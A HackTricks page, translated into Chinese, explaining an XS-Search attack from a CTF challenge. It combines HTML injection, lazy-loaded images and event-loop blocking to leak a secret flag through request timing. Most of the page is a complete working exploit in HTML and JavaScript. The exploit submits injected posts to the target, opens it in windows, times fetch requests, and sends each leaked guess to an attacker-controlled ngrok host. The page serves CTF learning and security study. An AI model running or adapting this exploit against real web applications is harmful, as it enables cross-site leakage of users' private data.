hacktricks/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md

# 事件循环阻塞 + 懒加载图片

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

* 您在**网络安全公司**工作吗？ 想要在HackTricks中看到您的**公司广告**？ 或者想要访问**PEASS的最新版本或下载HackTricks的PDF**？ 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 探索我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧**。

</details>

在[**这个利用**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45)中，[**@aszx87410**](https://twitter.com/aszx87410)通过HTML注入混合了**懒加载图片侧信道**技术和一种**事件循环阻塞技术**来泄露字符。

这是一个用于CTF挑战的**不同利用**，已经在以下页面中进行了评论。查看更多关于挑战的信息：

{% content-ref url="connection-pool-example.md" %}
[connection-pool-example.md](connection-pool-example.md)
{% endcontent-ref %}

这个利用的思路是：

* 帖子按字母顺序加载
* **攻击者**可以**注入**一个以**"A"**开头的**帖子**，然后一些**HTML标签**（如一个大的**`<canvas`**)将填满大部分**屏幕**，并且一些最终的**`<img lazy`标签**用于加载内容。
* 如果**攻击者**注入的是以"z"开头的相同帖子而不是"A"。带有**标志**的**帖子**将首先出现，然后**注入的**帖子将以初始"z"和**大**的**canvas**出现。因为带有标志的帖子首先出现，第一个canvas将占据整个屏幕，而注入的最终**`<img lazy`**标签不会在屏幕上显示，因此它们**不会被加载**。
* 然后，在**机器人**访问页面时，**攻击者**将**发送获取请求**。&#x20;
* 如果在帖子中注入的**图片**正在**加载**，这些**获取**请求将花费**更长时间**，因此攻击者知道**帖子在标志之前**（按字母顺序）。
* 如果**获取**请求**快速**，这意味着**帖子**在**标志之后**按字母顺序排列。

让我们来看看代码：
```html
<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>

<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>

<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>

<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'

const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')

// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1

// I have omited code here as apparently it wasn't necesary

// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}

}, 0)

async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()

setTimeout(() => {
run(str, resolve)
}, 500)
})
}

async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}

let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)

/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}

// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}

</script>
</body>
</html>
```
<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

* 你在**网络安全公司**工作吗？想要看到你的**公司在HackTricks中被宣传**吗？或者想要获取**PEASS的最新版本或下载HackTricks的PDF**吗？查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[NFT收藏品](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS & HackTricks周边**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我的**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

</details>